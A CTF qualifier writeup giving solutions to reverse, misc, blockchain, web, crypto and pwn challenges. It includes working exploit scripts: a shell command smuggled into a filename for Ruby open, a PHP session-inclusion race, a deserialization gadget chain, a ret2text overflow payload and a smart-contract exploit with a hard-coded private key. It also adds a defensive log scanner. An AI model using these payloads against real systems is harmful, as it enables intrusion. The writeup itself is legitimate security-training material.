第五空间 (Fifth Space) CTF Qualifier Writeup


Re



StrangeLanguage

Dynamic debugging and guessing at the memory contents showed that it is an XOR.

a = [0x53, 0xF, 0x5A, 0x54, 0x50, 0x55, 0x3, 0x2, 0x0, 0x7, 0x56, 0x7, 0x7, 0x5B, 0x9, 0x0, 0x50, 0x5, 0x2, 0x3, 0x5D, 0x5C, 0x50, 0x51, 0x52, 0x54, 0x5A, 0x5F, 0x2, 0x57, 0x7, 0x34]
# undo the chained XOR, working backwards from the last byte
for i in range(30, -1, -1):
    a[i] ^= a[i + 1]
flag = ""
for i in range(32):
    flag += chr(a[i])
print("flag{" + flag + "}")


Misc



Sign-in

CheckIn


BabyMi

First extract the USB data with tshark:
tshark -r a.pcap -T fields -e usb.capdata | tr -s '\n' > data_list

A Python script then reads the file line by line and strips the trailing newline from each line:
result += line[:-1]

Import the hex into 010 Editor and save it.
Then open the result in DiskGenius, which gives the video directly, and with it the flag.


Alpha10

After foremost:
a two-image blind watermark.

I recall the flag should be
flag{XqAe3QzK2ehD5fWv8jfBitPqHUw0}


Blockchain



CallBox

This is an original Paradigm CTF challenge.
For details see my Anquanke post:
https://www.anquanke.com/post/id/250115
Only the exploit is pasted here.

import web3
from web3 import Web3, HTTPProvider
from web3.auto import w3
import hashlib
import json
from Crypto.Util.number import *

web3 = Web3(HTTPProvider("http://114.115.157.63:8545/"))
acct = web3.eth.account.from_key('0x107601f7600411eb7203286cf0c83aa4f18b336196c3c98a33dcbb3a49d89a3d')

# Stage 1 (already run, kept as a string): deploy the first contract
"""abi=[
    {
        "stateMutability": "payable",
        "type": "fallback"
    }
]
opcode="6080604052348015600f57600080fd5b50605380601d6000396000f3fe60806040523273ffffffffffffffffffffffffffffffffffffffff16fffea2646970667358221220905d81ab00e22c4df5b3b4a0e06c36d582af1c1bda479c1f5d52b953fc13617064736f6c63430007000033"
contract=web3.eth.contract(abi=abi,bytecode=opcode)
construct_txn = contract.constructor().buildTransaction({
    'from': acct.address,
    'nonce': web3.eth.getTransactionCount(acct.address),
    'gas': 5000000,
    'gasPrice': web3.toWei('21', 'gwei')})
signed=acct.signTransaction(construct_txn)
tx_id=web3.eth.sendRawTransaction(signed.rawTransaction)
print(tx_id.hex())"""
#print(web3.eth.getTransactionReceipt('0xb04cf1ce18efe0007088ac00792d2c0fd2e159c156ab68eca5890edc2fd23d73'))
# address2 : 0xcaF2f0A364B8D23787F63ed98590F65970b4C50b
abi2 = [
    {
        "inputs": [],
        "stateMutability": "nonpayable",
        "type": "constructor"
    },
    {
        "stateMutability": "payable",
        "type": "fallback"
    }
]
# Stage 2 (already run, kept as a string): deploy the second contract
"""opcode="6080604052348015600f57600080fd5b5060838061001e6000396000f3fe6080604052600073caf2f0a364b8d23787f63ed98590f65970b4c50b6000806000806000855af19150508060325750604b565b3273ffffffffffffffffffffffffffffffffffffffff16ff5b00fea2646970667358221220cb8975fb237c4082d510ddec3bb377bd61c129f2794dfd25052e44f3c930257064736f6c63430007000033"
contract=web3.eth.contract(abi=abi2,bytecode=opcode)
construct_txn = contract.constructor().buildTransaction({
    'from': acct.address,
    'nonce': web3.eth.getTransactionCount(acct.address),
    'gas': 5000000,
    'gasPrice': web3.toWei('21', 'gwei')})
signed=acct.signTransaction(construct_txn)
tx_id=web3.eth.sendRawTransaction(signed.rawTransaction)
import time
time.sleep(2)
print(web3.eth.getTransactionReceipt(tx_id))
"""
#print(web3.eth.getTransactionReceipt('0xbb5d4dd2462e3a808fb3d52aabd8defe0472041971e6eec4b753417d0c4ce5dc'))
# address 1 = 0xeeFDEed9E7A39965a397De6bbe31dfb314525b06

def get_txn(src, dst, datad, nonce, value=0):
    return {
        "from": src,
        "to": dst,
        "gasPrice": web3.toWei(1, 'gwei'),
        "gas": 3000000,
        "value": web3.toWei(value, 'wei'),
        "nonce": nonce,  # web3.eth.getTransactionCount(src)
        "data": datad,
        'chainId': 8888
    }

# Stage 3 (already run, kept as a string): the final call, with address 1 as the argument
"""to_addr='0x9d629baE007F1B454A46fc03FA5FDedB335e5B18'
data=long_to_bytes(0xc24fe950000000000000000000000000eeFDEed9E7A39965a397De6bbe31dfb314525b06)
nonce=web3.eth.getTransactionCount(acct.address)
signed_txn = web3.eth.account.signTransaction(get_txn(acct.address, to_addr, data, nonce), acct.privateKey)
txn_hash = web3.eth.sendRawTransaction(signed_txn.rawTransaction).hex()
print("hack"+txn_hash)"""
print(web3.eth.getTransactionReceipt('0xc3de56cb62b665191cbc640b6a7a68ffa1d7c22e6aa4f577d0e1bc1d419c3827'))
#print(web3.eth.getTransactionReceipt('0x9ed9c7f8899040de1f54fe911b27474c56b9f4f9e17374fe552e40bbe96c9f70'))


Web



WebFtp

Scanning turned up files under /.git/.
Auditing the source: /Readme/mytz.php
lets the act parameter control a number of actions;
phpinfo()
is enough to get the flag.


PNG Image Converter

Ruby's open can execute commands.

import requests
url = "http://TARGET"  # placeholder: the challenge host was not included in the writeup
print(hex(ord('.')), hex(ord("/")))
res = requests.post(f"{url}/convert", data="file=echo bHMgLw== | base64 -d | sh;.png".encode("utf-8"),
                    headers={"Content-Type": "application/x-www-form-urlencoded"}, allow_redirects=False)
print(res.content)


EasyCleanup

Straight PHP session LFI, one shot.

import requests
import threading

class BasePHPSessionHelper:
    def __init__(self, host) -> None:
        self.host = host

    @staticmethod
    def createSession(upload_url, sess_name: str = "ekitest"):
        # keep uploading with PHP_SESSION_UPLOAD_PROGRESS set so the session file keeps appearing on disk
        while True:
            files = {
                "submit": ("eki.png", "GIF89awhatever", "image/png")
            }
            data = {"PHP_SESSION_UPLOAD_PROGRESS": "');?>"}
            headers = {'COOKIE': 'PHPSESSID=' + sess_name}
            r = requests.post(upload_url, files=files, headers=headers, data=data)

    def sessionInclude(self, sess_name="ekitest"):
        # session_path = "/var/lib/php5/sess_" + sess_name
        session_path = f"/var/lib/php/sessions/sess_{sess_name}"
        upload_url = f"{self.host}/lfi.php"
        include_url = f"{self.host}/lfi.php?lfi={session_path}"
        headers = {'COOKIE': 'PHPSESSID=' + sess_name}
        t = threading.Thread(target=self.createSession, args=(upload_url, sess_name))
        t.daemon = True
        t.start()
        while True:
            res = requests.post(include_url, headers=headers)
            if b'Eki' in res.content:
                print("[*] Get shell success.")
                break
            else:
                print("[-] retry.")
        return True

host = "http://114.115.134.72:32770"

class Exp(BasePHPSessionHelper):
    def sessionInclude(self, sess_name="ekitest"):
        # session_path = "/var/lib/php5/sess_" + sess_name
        # session_path = f"/var/lib/php/sessions/sess_{sess_name}"
        session_path = f"/tmp/sess_{sess_name}"
        upload_url = f"{self.host}/index.php"
        include_url = f"{self.host}/index.php?file={session_path}"
        headers = {'COOKIE': 'PHPSESSID=' + sess_name}
        t = threading.Thread(target=self.createSession, args=(upload_url, sess_name))
        t.daemon = True
        t.start()
        while True:
            res = requests.post(include_url, headers=headers)
            if b'Included' in res.content:
                print("[*] Get shell success.")
                print(include_url, res.content)
                break
            else:
                print("[-] retry.")
        return True

exp = Exp(host)
exp.sessionInclude("g")
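The race above only works because the include parameter is allowed to reach a session file. As an added example (not from the writeup), the following Python flags such requests in web-server access logs: it normalises percent-encoding, backslashes and traversal first, checks whether the value lands on a sess_ file in one of the default PHP session directories, and then singles out clients repeating the attempt, which is what the upload-progress race looks like from the server side. The log lines, hosts and threshold are constructed for illustration.

```python
import re
from collections import Counter
from posixpath import basename, normpath
from urllib.parse import parse_qsl, unquote, urlsplit

# Default PHP session.save_path locations (the ones tried in the exploit above).
SESSION_DIRS = ("/tmp", "/var/lib/php/sessions", "/var/lib/php5")
# Apache/Nginx "combined" log line: client ip, timestamp, request line, status.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Constructed sample log (not real traffic): one normal client, one client hammering the include.
LOG = """\
10.0.0.5 - - [10/Sep/2021:12:00:01 +0000] "GET /index.php?file=about.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Sep/2021:12:00:02 +0000] "POST /index.php HTTP/1.1" 200 88 "-" "python-requests/2.25.1"
10.0.0.9 - - [10/Sep/2021:12:00:02 +0000] "POST /index.php?file=/tmp/sess_g HTTP/1.1" 200 88 "-" "python-requests/2.25.1"
10.0.0.9 - - [10/Sep/2021:12:00:03 +0000] "POST /index.php?file=%2Ftmp%2Fsess_g HTTP/1.1" 200 88 "-" "python-requests/2.25.1"
10.0.0.9 - - [10/Sep/2021:12:00:03 +0000] "GET /lfi.php?lfi=..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_ekitest HTTP/1.1" 200 88 "-" "python-requests/2.25.1"
10.0.0.7 - - [10/Sep/2021:12:00:04 +0000] "GET /index.php?file=news/2021/sess_ion_notes.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

def decode_all(value, rounds=3):
    # Percent-decode repeatedly so double encoding (%252F -> %2F -> /) is seen the way PHP sees it.
    for _ in range(rounds):
        value, prev = unquote(value), value
        if value == prev: break
    return value

def resolve(path):
    # Pessimistic normalisation: backslashes become '/', and '..' is resolved against the filesystem root.
    return normpath("/" + decode_all(path).replace("\\", "/").lstrip("/"))

def is_session_include(value):
    # True when the value points at a PHP session file (sess_<id>) inside a session directory.
    p = resolve(value)
    return basename(p).startswith("sess_") and any(p.startswith(d + "/") for d in SESSION_DIRS)

def scan(log):
    # (ip, parameter, resolved path) for every request whose query string includes a session file.
    hits = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m: continue
        for key, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            if is_session_include(value): hits.append((m["ip"], key, resolve(value)))
    return hits

def noisy_clients(hits, threshold=3):
    # The upload-progress race needs many attempts, so repetition from one client is the strongest signal.
    counts = Counter(ip for ip, _, _ in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Feeding real logs through scan() and noisy_clients() gives the client addresses and the exact include parameter to block; the same resolve() check can be applied to the parameter before include() to reject anything outside the intended directory.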


yet_another_mysql_injection

mysql quine


pklovecloud

It seems any deserialization payload works:

<?php
$heat = 1;
class pkshow
{
    function echo_name()
    {
        return "Pk very safe^.^";
    }
}
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    function setCinder($cinder){
        $this->cinder = $cinder;
    }
    function __toString()
    {
        if (isset($this->cinder))
            return $this->cinder->echo_name();//here
    }
}
class ace
{
    public $filename;
    public $openstack;
    public $docker;
    function echo_name()
    {
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
            $file = "./{$this->filename}";
            var_dump($file);
            if (file_get_contents($file))
            {
                return file_get_contents($file);
            }
            else
            {
                return "keystone lost~";
            }
        }
    }
}
$b = new stdClass;
$b->neutron = $heat;
$b->nova = $heat;
$a = new ace;
$a->docker = $b;
$a->filename = 'flag.php';
$exp = new acp;
$exp->setCinder($a);
var_dump(urlencode(serialize($exp)));
$logData = unserialize(serialize($exp));
echo $logData;
?>


Crypto



ecc

The first: discrete_log gives it directly.
The second: the order of P has one large factor, but it is too large, so tweak the Pohlig-Hellman idea a little.
The third: the order of P equals p, so use Smart's attack.


# SageMath script
from Crypto.Util.number import *

# 1. direct discrete log
p = 146808027458411567
A = 46056180
B = 2316783294673
E = EllipticCurve(GF(p), [A, B])
P = E(119851377153561800, 50725039619018388, 1)
Q = E(22306318711744209, 111808951703508717, 1)
print(long_to_bytes(discrete_log(Q, P, operation='+')))

# 2. order of P has one large factor: Pohlig-Hellman on the small factors, BSGS on the cofactor
p = 1256438680873352167711863680253958927079458741172412327087203
A = 377999945830334462584412960368612
B = 604811648267717218711247799143415167229480
E = EllipticCurve(GF(p), [A, B])
P = E(550637390822762334900354060650869238926454800955557622817950, 700751312208881169841494663466728684704743091638451132521079, 1)
Q = E(1152079922659509908913443110457333432642379532625238229329830, 819973744403969324837069647827669815566569448190043645544592, 1)
print(factor(P.order()))
factor_list = P.order().factor()
factor_list = [i[0] ^ i[1] for i in factor_list]
factor_list = factor_list[:-1]          # drop the large factor
M_i = [P.order() // i for i in factor_list]
a_i = [discrete_log(M_i[i] * Q, M_i[i] * P, factor_list[i], operation='+') for i in range(len(factor_list))]
a = crt(a_i, factor_list)
m = 1
for i in factor_list:
    m *= i
# key = a + kk * m
# K = a * G + kk * m * G
# (K - a * G) = kk * (m * G)
# a new ecdlp and bound is kk
# kk is about 21 bit
# so just use bsgs
bound = (2 ^ 56) // m
kk = bsgs(m * P, Q - a * P, (bound // 2, bound), operation='+')
key = a + kk * m
print(bytes.fromhex(hex(key)[2:]))

# 3. anomalous curve (#E = p): Smart's attack
def HenselLift(P, p, prec):
    E = P.curve()
    Eq = E.change_ring(QQ)
    Ep = Eq.change_ring(Qp(p, prec))
    x_P, y_P = P.xy()
    x_lift = ZZ(x_P)
    y_lift = ZZ(y_P)
    x, y, a1, a2, a3, a4, a6 = var('x,y,a1,a2,a3,a4,a6')
    f(a1, a2, a3, a4, a6, x, y) = y^2 + a1*x*y + a3*y - x^3 - a2*x^2 - a4*x - a6
    g(y) = f(ZZ(Eq.a1()), ZZ(Eq.a2()), ZZ(Eq.a3()), ZZ(Eq.a4()), ZZ(Eq.a6()), ZZ(x_P), y)
    gDiff = g.diff()
    for i in range(1, prec):
        uInv = ZZ(gDiff(y=y_lift))
        u = uInv.inverse_mod(p^i)
        y_lift = y_lift - u*g(y_lift)
        y_lift = ZZ(Mod(y_lift, p^(i+1)))
    y_lift = y_lift + O(p^prec)
    return Ep([x_lift, y_lift])

def SmartAttack(P, Q, p, prec):
    E = P.curve()
    Eqq = E.change_ring(QQ)
    Eqp = Eqq.change_ring(Qp(p, prec))
    P_Qp = HenselLift(P, p, prec)
    Q_Qp = HenselLift(Q, p, prec)
    p_times_P = p*P_Qp
    p_times_Q = p*Q_Qp
    x_P, y_P = p_times_P.xy()
    x_Q, y_Q = p_times_Q.xy()
    phi_P = -(x_P/y_P)
    phi_Q = -(x_Q/y_Q)
    k = phi_Q/phi_P
    k = Mod(k, p)
    return k
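As an added example (not from the writeup), a pure-Python version of the second approach on a constructed toy curve: Pohlig-Hellman on the smooth part of the order of P, CRT, then BSGS for the cofactor under a key bound, the same steps as the Sage code above. The curve y^2 = x^3 - x over GF(103) and the point (6, 2) are constructed for illustration; the point for anyone choosing parameters is that the order of the base point must have a large prime factor and must not equal p, otherwise this runs in time proportional to the square root of the largest factor.

```python
from math import isqrt, prod
# Toy short-Weierstrass curve y^2 = x^3 + a*x + b over GF(p): a point is an (x, y) tuple, None is infinity.
def neg(P, p): return None if P is None else (P[0], -P[1] % p)
def add(P, Q, a, p):
    if P is None or Q is None: return Q if P is None else P
    if P[0] == Q[0] and (P[1] + Q[1]) % p == 0: return None    # Q == -P
    if P == Q: l = (3 * P[0] ** 2 + a) * pow(2 * P[1], -1, p)  # tangent slope (doubling)
    else: l = (Q[1] - P[1]) * pow(Q[0] - P[0], -1, p)          # chord slope
    x = (l * l - P[0] - Q[0]) % p
    return (x, (l * (P[0] - x) - P[1]) % p)
def mul(k, P, a, p):                  # double-and-add scalar multiplication
    R = None
    while k:
        if k & 1: R = add(R, P, a, p)
        P, k = add(P, P, a, p), k >> 1
    return R
def order(P, a, p):                   # smallest n > 0 with n*P = infinity (toy sizes only)
    n, R = 1, P
    while R is not None: R, n = add(R, P, a, p), n + 1
    return n
def factor(n):                        # prime powers of n by trial division, smallest prime first
    f, d = [], 2
    while d * d <= n:
        q = 1
        while n % d == 0: n, q = n // d, q * d
        f, d = f + [q] if q > 1 else f, d + 1
    return f + ([n] if n > 1 else [])
def crt(res, mods):                   # Chinese remainder theorem for pairwise coprime moduli
    x, m = 0, 1
    for r, q in zip(res, mods): x, m = x + m * ((r - x) * pow(m, -1, q) % q), m * q
    return x % m
def bsgs(G, H, lo, hi, a, p):         # smallest k in [lo, hi) with k*G == H, else None
    m, baby, R = isqrt(hi - lo) + 1, {}, None
    for j in range(m): baby.setdefault(R, j); R = add(R, G, a, p)     # baby steps j*G
    cur, giant = add(H, neg(mul(lo, G, a, p), p), a, p), neg(mul(m, G, a, p), p)
    for i in range(m + 1):                                             # giant steps H - lo*G - i*m*G
        if cur in baby: return lo + i * m + baby[cur]
        cur = add(cur, giant, a, p)
    return None
def solve_ecdlp(P, Q, a, p, bound=None):
    # Stage 1: Pohlig-Hellman on the small prime powers of ord(P) gives k mod m (m = smooth part).
    # Stage 2: k = r0 + kk*m, so Q - r0*P = kk*(m*P); BSGS over kk < bound/m, as in the Sage code above.
    n = order(P, a, p); bound = n if bound is None else bound
    pp = factor(n); small = [q for q in pp if q != max(pp)]            # leave out the big factor
    res = [bsgs(mul(n // q, P, a, p), mul(n // q, Q, a, p), 0, q, a, p) for q in small]
    m, r0 = prod(small), crt(res, small)                               # k = r0 (mod m)
    kk = bsgs(mul(m, P, a, p), add(Q, neg(mul(r0, P, a, p), p), a, p), 0, bound // m + 1, a, p)
    return r0 + kk * m
A, PRIME, P0 = -1, 103, (6, 2)        # constructed toy: y^2 = x^3 - x over GF(103), 104 points, ord(P0) | 52
Q0 = mul(37, P0, A, PRIME)            # 37 is the constructed secret scalar to recover
```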


secrets

Looks like a knapsack? Build the lattice below and it falls out.

# SageMath script
from gmpy2 import iroot
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.number import *

p = 7920896218820943056702891053785968782942077704655549145065876361907786355057528237061821280280635146678227702121299090049267547565989625947956850127609879
a = [5159988341992193282580685525745512910538614629527934692498086718630359717994948104271635300443062627349528208661883545208904466234606731357843882012950859,
     6335284643679900918720817621948758994408045076082703123014899812263624185305268879304513104269749790342063146501376008458665966651095670658606928517201721,
     6076126683981038494289949541335915228950649182831013867715530414744306299113418155691977393469353865827225836608438360416489035800225275307683760086087019]
c = 2262305826865903827781721021939132022253239409560318732728105425007767005455109451147816015758855318893496902119172860305961200859254558917933621119030425
just = 2 ^ 167
L = Matrix(ZZ, [[2,     0,     0,     0,     p * just],
                [0,     2^160, 0,     0,     a[0] * just],
                [0,     0,     2^224, 0,     a[1] * just],
                [0,     0,     0,     2^256, a[2] * just],
                [2^320, 2^320, 2^320, 2^320, c * just]
               ])
res = list(L.LLL()[0])[1:4]
res = [(2^320 - res[i]) // L[i + 1][i + 1] for i in range(3)]
secrets = [0 for i in range(3)]
secrets[1] = iroot(res[0] // res[1], int(2))[0]
secrets[0] = iroot(res[2], int(2))[0]
secrets[2] = iroot(res[1] // secrets[0], int(2))[0]
secrets = [int(_) for _ in secrets]
print(secrets)
key = hashlib.sha256(str(secrets).encode()).digest()
cipher = AES.new(key, AES.MODE_ECB)
enc_flag = cipher.decrypt(long_to_bytes(0x99ff236d4f1e020e6c83cc154e20f71eb510913056d47344b44a87f98664efd3))
print(enc_flag)


doublesage

The challenge is broken.
Sending any 5 numbers passes the first stage,
sending another 15 passes the second,
and then you get the flag.

The exploit below is also wrong. The challenge says it wants a 1 * 23 vector, so I blindly sent some noise back
(all zeros also works).
This challenge has problems.

# SageMath (Matrix, block_matrix, identity_matrix) plus pwntools
from pwn import *
import json
context.log_level = 'debug'
ip, port = '122.112.210.186', 51436

def deal(s):
    return json.loads(s.replace(' ', ' ').replace(' ', ' ').replace('[ ', '[').replace(' ', ',').replace('\n', ''))

io = remote(ip, port)
io.recvuntil('23 :\n')
A = []
for i in range(5):
    A.append(deal(io.recvline().decode()) + [0])
io.recvuntil('23 :\n')
b = deal(io.recvline().decode()) + [290]
A = Matrix(ZZ, A)
b = Matrix(ZZ, b)
mid = block_matrix([29 * identity_matrix(23), Matrix(ZZ, [0] * 23).T], ncols=2)
L = block_matrix([A, mid, b], nrows=3, subdivide=False)
B = L.LLL()
print(B)
E = Matrix(B[-1]).T[:-1].T
io.recvuntil('29 :\n')
io.sendline(E.str())
print(io.recvline())
# io.interactive()
io.recvline()
io.recvline()
io.recvuntil('143 :\n')
A = []
for i in range(15):
    # print('###########')
    aaaa = io.recvuntil('\n')
    # print(aaaa)
    A.append(deal(aaaa.decode()) + [0])
io.recvuntil('143 :\n')
b = deal(io.recvuntil(']').decode()) + [227]
A = Matrix(ZZ, A)
b = Matrix(ZZ, b)
mid = block_matrix([227 * identity_matrix(143), Matrix(ZZ, [0] * 143).T], ncols=2)
L = block_matrix([A, mid, b], nrows=3, subdivide=False)
print('start LLL')
B = L.LLL()
print('done. #########')
print(B)
E = Matrix(B[-1]).T[:-1].T
io.recvuntil('227 :\n')
io.sendline(E.str())
print(io.recvline())


Pwn



Pwn1

ret2text

#coding:utf-8
from pwn import *
import subprocess, sys, os
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
elf_path = './pwn'
ip = '139.9.123.168'
port = 32548
remote_libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
context(os='linux', arch='amd64')
context.log_level = 'debug'

def run(local=1):
    global elf
    global p
    if local == 1:
        elf = ELF(elf_path, checksec=False)
        p = elf.process()
    else:
        p = remote(ip, port)

run(0)
rdi = 0x000000000040120b
# padding as bytes so the payload concatenates with p64() under Python 3 as well
payload = b'a' * 144 + p64(0) + p64(rdi) + p64(0x403408) + p64(0x401030)
p.send(payload)
p.interactive()

